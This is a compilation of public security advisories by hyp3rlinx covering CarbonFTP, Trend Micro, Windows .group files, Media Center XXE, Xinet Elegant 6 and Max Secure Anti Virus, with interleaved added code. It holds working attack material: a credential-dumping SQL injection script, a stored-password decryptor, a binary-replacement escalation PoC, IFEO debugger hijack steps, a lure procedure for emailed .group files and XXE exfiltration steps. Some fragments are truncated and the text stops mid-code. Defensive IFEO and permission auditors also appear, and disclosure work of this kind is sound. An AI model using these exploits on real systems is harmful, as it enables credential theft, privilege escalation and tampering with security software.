Neowise CarbonFTP v1.4 Insecure Proprietary Password Encryption CVE-2020-6857
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NEOWISE-CARBONFTP-v1.4-INSECURE-PROPRIETARY-PASSWORD-ENCRYPTION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.neowise.com

[Product]
CarbonFTP v1.4

CarbonFTP is a file synchronization tool that synchronizes local files with a remote FTP server and vice versa. It provides a step-by-step wizard to select the folders to be synchronized, the direction of the synchronization and an option to set file masks that limit the transfer to specific file types. Settings can be saved as projects so they can be quickly reused later.

Download: https://www.neowise.com/freeware/
Hash: 7afb242f13a9c119a17fe66c6f00a1c8

[Vulnerability Type]
Insecure Proprietary Password Encryption

[CVE Reference]
CVE-2020-6857

[Affected Component]
Password Encryption

[Impact Escalation of Privileges]
true

[Impact Information Disclosure]
true

[Security Issue]
CarbonFTP v1.4 uses insecure proprietary password "encryption" with a hard-coded, weak key. The key for locally stored FTP server passwords is hard-coded in the binary. The password bytes, read as hex, are converted to decimal and the key "97F" (hex) is added to the result; the key 97F appears to be the same for every copy of the executable on every system. Finally, the passwords are stored as decimal values.

If a user chooses to save the project, the passwords are stored in ".CFTP" local configuration files, which can be found under "C:\Users\<user>\AppData\Roaming\Neowise\CarbonFTPProjects".

e.g.
Password=STRING|"2086721956209392195620939"

Observing some very short password examples, interesting patterns emerge:

27264 27360 27360 27360 27360 = a
27520 27617 27617 27617 27617 = b
27266 27616 27360 27361 27616 = aab
27521 27616 27616 27616 27616 = ba

Password encryption/decryption works as follows.

Encryption process example:

484C as decimal is the value 18508.
97F (hex) as decimal is the value 2431 (the encryption key).
18508 + 2431 = 20939, so the value 20939 represents the ASCII characters "HL".

To decrypt, we simply reverse the operation above:
20939 - 2431 = 18508
Next, convert the decimal value 18508 to hex, which gives 484C.
Finally, convert the hex value 484C to ASCII to retrieve the plaintext password "HL".
(The decryption loop below stores each value with "mov word ptr [esi],ax", i.e. little-endian, so 0x484C lands in memory as the bytes 4C 48, "LH".)

CarbonFTP passwords shorter than nine characters are padded with characters taken from the password itself until a length of nine bytes is reached. The two-character password "XY", in encrypted form "2496125048250482504825048", is padded with "XY" until it reaches nine bytes: "XYXYXYXYX". Similarly, the password "HELL" is stored as "2086721956209392195620939" and is again padded because its length is less than nine bytes. Therefore we get several cracked password candidates, such as:

"HELLHELL | HELLHEL | HELLH | HELL | HEL | HE | HELLHELLH"

However, the longer the password, the easier it becomes to crack: passwords of nine bytes or more are decrypted in one shot, without several candidates to choose from (one of which is the correct password). Therefore "LONGPASSWORD!" is stored as the encrypted string "219042273422734224782298223744247862350210947" and, because it is greater than nine bytes, is cracked without any candidate passwords being returned.

From offset 0047DA6F to 0047DAA0 is the loop that performs the password decryption process, using the same password "HELL" as an example.
BPX @47DA6F

0047DA6F | 8D 45 F0       | lea eax,dword ptr ss:[ebp-10]  |
0047DA72 | 50             | push eax                       |
0047DA73 | B9 05 00 00 00 | mov ecx,5                      |
0047DA78 | 8B D3          | mov edx,ebx                    |
0047DA7A | 8B 45 FC       | mov eax,dword ptr ss:[ebp-4]   | [ebp-4]:"2086721956209392195620939"
0047DA7D | E8 F6 6B F8 FF | call carbonftp.404678          |
0047DA82 | 83 C3 05       | add ebx,5                      |
0047DA85 | 8B 45 F0       | mov eax,dword ptr ss:[ebp-10]  | [ebp-10]:"20867"
0047DA88 | E8 AF AD F8 FF | call carbonftp.40883C          |
0047DA8D | 2B 45 F8       | sub eax,dword ptr ss:[ebp-8]   | ;<=== BOOOM ENCRYPT/DECRYPT KEY 97F IN DECIMAL ITS 2431
0047DA90 | 66 89 06       | mov word ptr ds:[esi],ax       |
0047DA93 | 83 C6 02       | add esi,2                      |
0047DA96 | 8B 45 FC       | mov eax,dword ptr ss:[ebp-4]   |
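The scheme above, as an added example that is not CarbonFTP's code and not part of the advisory: it implements the five-digit-chunk, key-0x97F transform described in the advisory and adds one observation taken from the advisory's own samples together with the "mov word ptr [esi],ax" in the loop, namely that each word is stored little-endian and the first decoded byte is the password length (a Pascal ShortString), which removes the candidate ambiguity for short passwords. The padding rule for even lengths of nine or more is an assumption, since the advisory only shows padded lengths of 9 and 17.

```python
"""Decrypt and re-create CarbonFTP v1.4 .CFTP stored passwords (CVE-2020-6857).

Added example, not CarbonFTP's code and not the advisory's. Words are five
decimal digits each, the key 0x97F (2431) is subtracted, and the 16-bit result
is stored little-endian; byte 0 of the decoded buffer is the password length.
"""
import re

KEY = 0x97F            # 2431, hard-coded in the binary
CHUNK = 5              # each stored word occupies five decimal digits
MIN_PADDED_LEN = 9     # shorter passwords are padded by repetition to this many bytes
CFTP_LINE = re.compile(r'^\s*Password=STRING\|"(\d+)"\s*$')


def decode_buffer(stored: str) -> bytes:
    """Reverse the key addition and re-assemble the little-endian 16-bit words."""
    if not stored.isdigit() or len(stored) % CHUNK:
        raise ValueError("stored value must be a multiple of %d decimal digits" % CHUNK)
    buf = bytearray()
    for i in range(0, len(stored), CHUNK):
        word = int(stored[i:i + CHUNK]) - KEY
        if not 0 <= word <= 0xFFFF:
            raise ValueError("chunk %r is not a key-shifted 16-bit word" % stored[i:i + CHUNK])
        buf += word.to_bytes(2, "little")       # matches 'mov word ptr [esi],ax'
    return bytes(buf)


def decrypt_password(stored: str) -> str:
    """Return the password; byte 0 is its length (ShortString layout, observed from the samples)."""
    buf = decode_buffer(stored)
    length = buf[0]
    if length == 0 or length > len(buf) - 1:
        raise ValueError("length byte %d does not fit the %d-byte buffer" % (length, len(buf)))
    return buf[1:1 + length].decode("latin-1")


def encrypt_password(password: str) -> str:
    """Produce the stored form. The password is repeated until at least MIN_PADDED_LEN
    bytes are present; one more byte is repeated when length prefix plus text would not
    fill whole words (assumption: the advisory only shows padded lengths of 9 and 17)."""
    raw = password.encode("latin-1")
    if not 1 <= len(raw) <= 255:
        raise ValueError("a ShortString password holds 1..255 bytes")
    padded = bytearray(raw)
    while len(padded) < MIN_PADDED_LEN or (1 + len(padded)) % 2:
        padded.append(raw[len(padded) % len(raw)])
    buf = bytes([len(raw)]) + bytes(padded)
    words = [int.from_bytes(buf[i:i + 2], "little") + KEY for i in range(0, len(buf), 2)]
    return "".join("%05d" % w for w in words)   # printable ASCII always yields five digits


def password_from_cftp_line(line: str) -> str:
    """Pull the stored value out of a .CFTP 'Password=STRING|"..."' line and decrypt it."""
    m = CFTP_LINE.match(line)
    if not m:
        raise ValueError("not a CarbonFTP password line")
    return decrypt_password(m.group(1))


if __name__ == "__main__":
    for sample in ("2086721956209392195620939", "2496125048250482504825048",
                   "219042273422734224782298223744247862350210947"):
        print(sample, "->", decrypt_password(sample), "| padded buffer:", decode_buffer(sample)[1:])
```

Decoding the advisory's long sample with the length byte gives the 17-character password "LOOOOONGPASSWORD!" (length byte 0x11); the short samples decode to exactly the single candidate the author had to pick by hand.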
Trend Micro Security 2019 (Consumer) Multiple Products Security Bypass Protected Service Tampering CVE-2019-19697
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-SECURITY-CONSUMER-SECURITY-BYPASS-PROTECTED-SERVICE-TAMPERING.txt
[+] ISR: ApparitionSec

[Vendor]
www.trendmicro.com

[Product]
Trend Micro Security 2019 (Consumer) Multiple Products

Trend Micro Security provides comprehensive protection for your devices, including protection against ransomware, viruses, malware, spyware and identity theft.

[Vulnerability Type]
Security Bypass Protected Service Tampering

[CVE Reference]
CVE-2019-19697

[Security Issue]
Trend Micro Maximum Security is vulnerable to arbitrary code execution because it allows the creation of a registry key that targets a process running as SYSTEM. This lets malware gain elevated privileges and take over or shut down services that require SYSTEM privileges, such as Trend Micro's "Asmp" service "coreServiceShell.exe", which does not allow Administrators to tamper with it. An attacker or malware can therefore gain elevated privileges and tamper with protected services by disabling them or otherwise preventing them from starting. Note that administrator privileges are required to exploit this vulnerability.

[CVSS 3.0 Score]
3.9

[Affected Versions]
Platform: Microsoft Windows
Premium Security 2019 (v15)
Maximum Security 2019 (v15)
Internet Security 2019 (v15)
Antivirus + Security 2019 (v15)

[References]
https://esupport.trendmicro.com/en-us/home/pages/technical-support/1124090.aspx

[Exploit/POC]
1) Create an entry under the following registry key targeting "PtWatchdog.exe"; its debugger string value will point at an arbitrary executable to gain SYSTEM privileges.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PtWatchdog.exe

2) Create a string value named "debugger" under that key and give it the path of the executable you wish to run as SYSTEM.

3) Restart the machine, or wait until the service restarts; you then get SYSTEM and can disable the Trend Micro endpoint security coreServiceShell.exe service.

[Network Access]
Local

[Severity]
Low

[Disclosure Timeline]
Vendor Notification: October 8, 2019
Vendor confirms issue: October 28, 2019
Vendor release date: January 14, 2020
January 16, 2020 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
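The defensive counterpart of the steps above, as an added example that is not part of the advisory: an auditor that reads the text of a `reg export` of the Image File Execution Options key (a constructed sample is embedded), lists every Debugger value and rates it high when the hijacked image is one of the SYSTEM processes the advisory names or when the debugger lives outside the usual install locations. The protected-image list and the trusted path prefixes are assumptions to tune per product and fleet; the key layout and `.reg` escaping are the real format.

```python
"""Audit Image File Execution Options (IFEO) Debugger values from a reg export.

Added example, not part of the advisory. PROTECTED_IMAGES holds the process
names the advisory mentions; TRUSTED_PREFIXES is an assumption about where a
legitimate debugger is installed.
"""
import re

IFEO_KEY = re.compile(
    r"^\[HKEY_LOCAL_MACHINE\\SOFTWARE\\(?:WOW6432Node\\)?Microsoft\\Windows NT\\CurrentVersion\\"
    r"Image File Execution Options\\([^\\\]]+)\]$", re.IGNORECASE)
REG_VALUE = re.compile(r'^"([^"]+)"=(?:"((?:[^"\\]|\\.)*)"|(hex(?:\([0-9a-f]+\))?:.*|dword:[0-9a-f]+))$',
                       re.IGNORECASE)

PROTECTED_IMAGES = {"ptwatchdog.exe", "coreserviceshell.exe"}   # from the advisory; extend per product
TRUSTED_PREFIXES = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                    "c:\\program files\\", "c:\\program files (x86)\\")   # assumption: tune per fleet

# Constructed sample in 'reg export' format (UTF-16 on disk; decoded text here).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PtWatchdog.exe]
"debugger"="C:\\Users\\Public\\updater.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe]
"GlobalFlag"=dword:00000200

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="\"C:\\Windows\\System32\\vsjitdebugger.exe\" -p"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe"
'''


def parse_reg_export(text):
    """Yield (image, value_name, value_data) for each value under an IFEO\\<image> sub-key."""
    image = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("["):
            m = IFEO_KEY.match(line)
            image = m.group(1) if m else None      # values under other keys are ignored
            continue
        m = REG_VALUE.match(line) if image else None
        if not m:
            continue
        name, string_data, binary_data = m.groups()
        if string_data is not None:                # undo .reg escaping of \ and "
            string_data = string_data.replace("\\\\", "\\").replace('\\"', '"')
        yield image, name, string_data if string_data is not None else binary_data


def debugger_executable(command_line):
    """First token of the Debugger command line, honouring a quoted path."""
    command_line = command_line.strip()
    if command_line.startswith('"'):
        end = command_line.find('"', 1)
        return command_line[1:end] if end > 0 else command_line[1:]
    return command_line.split(" ", 1)[0]


def audit_ifeo(reg_text):
    findings = []
    for image, name, data in parse_reg_export(reg_text):
        if name.lower() != "debugger":
            continue
        exe = debugger_executable(data)
        reasons = []
        if image.lower() in PROTECTED_IMAGES:
            reasons.append("target runs as SYSTEM and is protected from Administrators")
        if not exe.lower().startswith(TRUSTED_PREFIXES):
            reasons.append("debugger outside trusted install locations")
        findings.append({"image": image, "debugger": exe,
                         "severity": "high" if reasons else "review", "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_ifeo(SAMPLE_REG):
        print("%-7s %-16s -> %s  %s" % (f["severity"], f["image"], f["debugger"], "; ".join(f["reasons"])))
```

On a live host the input comes from `reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" ifeo.reg /y` (and the WOW6432Node key), read with `open("ifeo.reg", encoding="utf-16")` because `reg export` writes UTF-16 with a BOM. Any Debugger value on a service image that restarts as SYSTEM deserves the same scrutiny as the PtWatchdog.exe case.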
Trend Micro Security (Consumer) Multiple Products Persistent Arbitrary Code Execution CVE-2019-20357
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-SECURITY-CONSUMER-PERSISTENT-ARBITRARY-CODE-EXECUTION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.trendmicro.com

[Product(s)]
Trend Micro Security (Consumer) Multiple Products

Trend Micro Security provides comprehensive protection for your devices, including protection against ransomware, viruses, malware, spyware and identity theft.

[Vulnerability Type]
Persistent Arbitrary Code Execution

[CVE Reference]
CVE-2019-20357

[CVSSv3 Score]
6.7

[Security Issue]
Trend Micro Security can potentially allow an attacker to use a malicious program to escalate privileges to SYSTEM integrity and attain persistence on a vulnerable system.

[Product Affected Versions]
Platform: Microsoft Windows
Premium Security 2019 (v15) and 2020 (v16)
Maximum Security 2019 (v15) and 2020 (v16)
Internet Security 2019 (v15) and 2020 (v16)
Antivirus + Security 2019 (v15) and 2020 (v16)

[References]
https://esupport.trendmicro.com/en-us/home/pages/technical-support/1124099.aspx

[Exploit/POC]
Compile the C test code "Program.c":

#include <stdio.h>
#include <stdlib.h>

void main(void){
    puts("Done!");
    system("pause");
}

1) Place it under the C:\ directory.
2) Reboot the machine; the coreServiceShell.exe service loads and executes our binary with SYSTEM integrity.

[Network Access]
Local

[Severity]
Medium

[Disclosure Timeline]
Vendor Notification: October 8, 2019
Vendor advisory: January 15, 2020
January 16, 2020 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Microsoft Windows .Group File / URL Field Code Execution
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.GROUP-FILE-URL-FIELD-CODE-EXECUTION.txt
[+] twitter.com/hyp3rlinx
[+] apparitionsec@gmail
[+] ISR: Apparition Security

[Vendor]
www.microsoft.com

[Product]
Windows ".Group" File Type

Group files are a collection of contacts created by Windows Contacts, an embedded contact management program included with Windows. A .group file contains a list of contacts saved into a group, which can be used to create a mailing list for sending email messages to multiple addresses at once.

[Vulnerability Type]
URL Field Code Execution

[CVE Reference]
N/A

[Security Issue]
Windows ".group" files are related to Contact files and suffer from unexpected code execution when the "Go" button next to the Website field on the "Contact Group Details" tab is clicked, if the website URL field points to an executable file. This is the same type of vulnerability that affects Windows .contact files, which remains unfixed as of the time of this writing and has a Metasploit module available.

[References]
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt

Therefore, attacker-supplied executables can run unexpectedly for the user, who believes they are visiting a website when they click the Website "Go" button. Moreover, if the files are compressed with certain archive utilities it may be possible to skirt security warnings even when the executable was downloaded from the internet or copied from a network share.

This exploit requires a bit more user interaction than the previously disclosed .contact file vulnerability, as Windows will complain about the .group file if it is not in the Contacts directory. Advisory released for the sake of completeness and user security awareness.

[Exploit/POC]
1) Create a Windows .group file.
2) Create a directory named "http".
3) Create an executable file with a .com extension (rename .exe to .com), named e.g. www.microsoft.com, and place it in the "http" directory alongside the .group file.
4) Point the website URL at the executable using path traversal, e.g. "http.\www.microsoft.com", as the website address in the .group file.
   Note: the directory traversal can also point to other directories, e.g. ..\Downloads\http.\microsoft.com, but the downside is that the URL looks very sketchy.
5) Package it up in an archive (.rar etc.).
6) Send the .group file via email, or have it downloaded, and lure the user into placing the archive in the "C:\Users\<user>\Contacts" directory.
7) Open the archive and double-click the .group file (Windows will complain with an error telling you to move it to the Contacts folder if it is not already there), then click the website address "Go" button.

The attacker's executable runs instead of navigating to a website, as the end user would expect.

[Severity]
High

[Disclosure Timeline]
Vendor Notification: the same type of vulnerability affecting .contact files was disclosed January 16, 2019; status remains unfixed.
January 1, 2020 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Microsoft Windows Media Center XXE MotW Bypass (Anniversary Edition)
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS-MEDIA-CENTER-MOTW-BYPASS-XXE-ANNIVERSARY-EDITION.txt
[+] ISR: Apparition Security

[Vendor]
www.microsoft.com

[Product]
Microsoft Windows Media Center

Windows Media Center is a discontinued digital video recorder and media player created by Microsoft. Media Center was first introduced to Windows in 2002 on Windows XP Media Center Edition.

[Vulnerability Type]
XML External Entity MotW Bypass (Anniversary Edition)

[CVE Reference]
N/A

[Security Issue]
This vulnerability was originally released by me on December 4, 2016, yet it remains unfixed. To make matters worse, the "mark-of-the-web" (MotW) does not matter here; it is simply ignored. That is, if the .MCL file is downloaded from the internet it receives the MotW, yet files are still exfiltrated. Therefore I am releasing this "anniversary edition" XXE with the important MotW information.

This is a fully working remote information disclosure vulnerability that still affects Windows 7. Windows 7 reaches end of life this January, yet it is still used by many organizations. Furthermore, it seems that Windows 8.1 (Pro) can also run Windows Media Center, but I have not tested it.

Host the "FindMeThatBiotch.dtd" DTD file in the web root of the attacker server (port 80, etc.).
Download the ".mcl" file using Microsoft Internet Explorer.
Check the MotW in the directory where the .mcl file was downloaded ("dir /r") and note that the Zone.Identifier:$DATA stream exists.
Open the file and watch the data leave: still vulnerable after all these years.

OS: Windows 7 (tested successfully) and possibly Windows 8.1 Pro

[Exploit/POC]
1) "M$-Wmc-Anniversary-Motw-Bypass.mcl"

# PoC
/FindMeThatBiotch.dtd"> %junk; %param666; %FindMeThatBiotch; ]>

2) "FindMeThatBiotch.dtd"

/%data666;'>">

3) Auto-exploit PHP .mcl file downloader.

/M$-Wmc-Anniversary-Motw-Bypass.mcl';
header('Content-Type: application/octet-stream');
header("Content-Transfer-Encoding: Binary");
header("Content-disposition: attachment; filename=\"" . basename($url) . "\"");
readfile($url);
?>

4) python -m SimpleHTTPServer 80

[POC Video URL]
https://www.youtube.com/watch?v=zcrATpBNAZ0

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: December 4, 2016
MSRC: "won't fix"
Dec 2, 2019 : Re-public "unfixed anniversary" Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
NAPC Xinet Elegant 6 Asset Library Web Interface v6.1.655 Pre-Auth SQL Injection 0Day CVE-2019-19245
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NAPC-XINET-ELEGANT-6-ASSET-LIBRARY-WEB-INTERFACE-PRE-AUTH-SQL-INJECTION.txt
[+] ISR: ApparitionSec

[Vendor]
www.napc.com

[Product]
Xinet Elegant 6 Asset Library Web Interface v6.1.655

Web-based interface for the Xinet asset management solution.

[Vulnerability Type]
Pre-Auth SQL Injection

[CVE Reference]
CVE-2019-19245

[Security Issue]
NAPC Xinet (interface) Elegant 6 Asset Library v6.1.655 allows pre-authentication error-based SQL injection via the /elegant6/login LoginForm[username] field when double quotes are used. The vulnerable version appears to be old, but it may still be found deployed, as I have.

Vulnerable Parameter: LoginForm[username] (POST method)

[Exploit/POC]

import requests, time, re, sys, argparse

# NAPC Xinet Elegant 6 Asset Library v6.1.655
# Pre-Auth SQL Injection 0day Exploit
# By hyp3rlinx
# ApparitionSec
#==
# This will dump tables, usernames and passwords in vulnerable versions
# REQUIRED PARAMS: LoginForm[password]=1&LoginForm[rememberMe]=0&LoginForm[username]=SQL
# SQL INJECTION VULN PARAM --> LoginForm[username]
#

IP = ""
PORT = "80"
URL = ""
NUM_INJECTS = 20
k = 1
j = 0
TABLES = False
CREDS = False
SHOW_SQL_ERROR = False


def vuln_ver_chk():
    global IP, PORT
    TARGET = "http://" + IP + ":" + PORT + "/elegant6/login"
    response = requests.get(TARGET)
    if re.findall(r'\bElegant",appVersion:"6.1.655\b', response.text):
        print("[+] Found vulnerable NAPC Elegant 6 Asset Library version 6.1.655.")
        return True
    print("[!] Version not vulnerable :(")
    return False


def sql_inject_request(SQL):
    global IP, PORT
    URL = "http://" + IP + ":" + PORT + "/elegant6/login"
    headers = {'User-Agent': 'Mozilla/5.0'}
    payload = {'LoginForm[password]': '1', 'LoginForm[rememberMe]': '0', 'LoginForm[username]': SQL}
    session = requests.Session()
    res = session.post(URL, headers=headers, data=payload)
    idx = res.text.find('CDbCommand')    # Start of SQL Injection Error in response
    idx2 = res.text.find('key 1')        # End of SQL Injection Error in response
    return res.text[idx: idx2 + 3]


# Increments SQL LIMIT clause 0,1, 1,2, 1,3 etc
def inc():
    global k, j
    while j < NUM_INJECTS:
        j += 1
        if k != 1:
            k += 1
        return str(j) + ',' + str(k)


def tidy_up(results):
    global CREDS
    idx = results.find("'")
    if idx != -1:
        idx2 = results.rfind("'")
        if not CREDS:
            return results[idx + 1: idx2 - 2]
        else:
            return results[idx + 2: idx2]


def breach(i):
    global k, j, NUM_INJECTS, SHOW_SQL_ERROR
    result = ""
    # Dump Usernames & Passwords
    if CREDS:
        if i % 2 == 0:
            target = 'username'
        else:
            target = 'password'
        SQL = ('"and (select 1 from(select count(*),concat((select(select concat(0x2b,' + target + ')) '
               'from user limit ' + str(i) + ', 1),floor(rand(0)*2))x from user group by x)a)-- -')
        if not SHOW_SQL_ERROR:
            result = tidy_up(sql_inject_request(SQL))
        else:
            result = sql_inject_request(SQL) + "\n"
        print("[+] Dumping " + target + ": " + str(result))
    # Dump Tables
    if TABLES:
        while j < NUM_INJECTS:
            nums = inc()
            SQL = ('"and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables '
                   'where table_schema=database() limit ' + nums + '),0x3a,floor(rand(0)*2))y '
                   'from information_schema.tables group by y) x)-- -')
            if not SHOW_SQL_ERROR:
                result = tidy_up(sql_inject_request(SQL))
            else:
                result = sql_inject_request(SQL) + "\n"
            print("[+] Dumping Table... " + str(result))
            time.sleep(0.3)


def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--ip_address", help=".")
    parser.add_argument("-p", "--port", help="Port, Default is 80")
    parser.add_argument("-t", "--get_tables", nargs="?", const="1", help="Dump Database Tables.")
    parser.add_argument("-c", "--creds", nargs="?", const="1", help="Dump Database Credentials.")
    parser.add_argument("-m", "--max_injects", nargs="?", const="1", help="Max SQL Injection Attempts, Default is 20.")
    parser.add_argument("-s", "--show_sql_errors", nargs="?", const=
Max Secure Anti Virus Plus v19.0.4.020 Insecure Permissions CVE-2019-19382
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] ISR: ApparitionSec

[Vendor]
www.maxpcsecure.com

[Affected Product Code Base]
Max Secure Anti Virus Plus - 19.0.4.020
File hash: ab1dda23ad3955eb18fdb75f3cbc308a msplusx64.exe

[Vulnerability Type]
Insecure Permissions

[CVE Reference]
CVE-2019-19382

[Security Issue]
Max Secure Anti Virus Plus 19.0.4.020 has insecure permissions on its installation directory. Local attackers or malware running with ordinary user rights can replace a .exe or .dll file there to achieve privilege escalation.

C:\Program Files\Max Secure Anti Virus Plus>cacls * | more
C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F
                                                   BUILTIN\Users:(ID)F
                                                   NT AUTHORITY\SYSTEM:(ID)F
                                                   BUILTIN\Administrators:(ID)F

[Affected Component]
Permissions on installation directory

[Exploit/POC]

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe"
#define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe"
#define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp"

/* Max Secure Anti Virus Plus PoC
   By hyp3rlinx */

BOOL PWNED = FALSE;

/* TRUE when szPath names an existing file (not a directory). */
BOOL FileExists(LPCTSTR szPath){
    DWORD dwAttrib = GetFileAttributes(szPath);
    return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
}

void main(void){
    /* First run: park a copy of the legitimate EXE as 666.tmp so we know we have been here. */
    if(!FileExists(DISABLED_TARGET)){
        CopyFile(TARGET, TMP, FALSE);
        Sleep(1000);
        CopyFile(TMP, DISABLED_TARGET, FALSE);
        printf("[+] Max Secure Anti Virus Plus EoP PoC\n");
        Sleep(1000);
        printf("[+] Disabled MaxSDUI.exe ...\n");
        Sleep(300);
    }else{
        PWNED = TRUE;
    }
    if(!PWNED){
        char fname[MAX_PATH];
        char newLoc[] = TARGET;
        DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
        if (size){
            /* Overwrite the product binary with this PoC; the world-writable ACL allows it. */
            printf("[+] Copying exploit to vuln dir...\n");
            Sleep(1000);
            CopyFile(fname, TARGET, FALSE);
            printf("[+] Replaced legit Max Secure EXE...\n");
            Sleep(2000);
            printf("[+] Done!\n");
            MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxPwn.lnk");
            Sleep(1000);
            exit(0);
        }
    }else{
        /* Second run: we are now executing in place of MaxSDUI.exe. */
        if(FileExists(TMP)){
            remove(TMP);
        }
        printf("[+] Max Secure Anti Virus Plus PWNED!!!\n");
        printf("[+] hyp3rlinx\n");
        system("pause");
    }
}

[POC Video URL]
https://www.youtube.com/watch?v=DXSV5geXkTw

[Network Access]
Local

[Severity]
High

[Disclosure Timeline]
Vendor Notification: November 19, 2019
Vendor: "received a reply they will fix soon"
Status request: November 24, 2019
No replies other than automated response.
November 29, 2019 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
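The check a practitioner would run before trusting an installer, as an added example that is not part of the advisory: a parser for the `cacls` layout shown above (path plus first ACE on one line, further ACEs indented beneath it) that reports every file a low-privileged principal can modify, which is exactly the condition the PoC exploits. The listing is a constructed sample in the same format; the "Well Behaved AV" directory is invented as a correctly permissioned control case, and the principal list is an assumption to extend with site-specific groups.

```python
"""Find product files that standard users may overwrite, from `cacls` output.

Added example, not part of the advisory. SAMPLE_CACLS is constructed in the
layout cacls prints; WEAK_PRINCIPALS is an assumption (extend per site).
"""
import re

PRINCIPAL = (r"(?:NT AUTHORITY|NT SERVICE|BUILTIN|CREATOR OWNER|APPLICATION PACKAGE AUTHORITY|Everyone|"
             r"[A-Za-z0-9_.$-]+)(?:\\[^:\\]+)?")
ACE = r"(?P<who>" + PRINCIPAL + r"):(?P<flags>(?:\([A-Z ]+\))*)(?P<right>[NRWCF])"
FIRST_LINE = re.compile(r"^(?P<path>[A-Za-z]:\\.*?)\s+" + ACE + r"$")
NEXT_LINE = re.compile(r"^\s+" + ACE + r"$")

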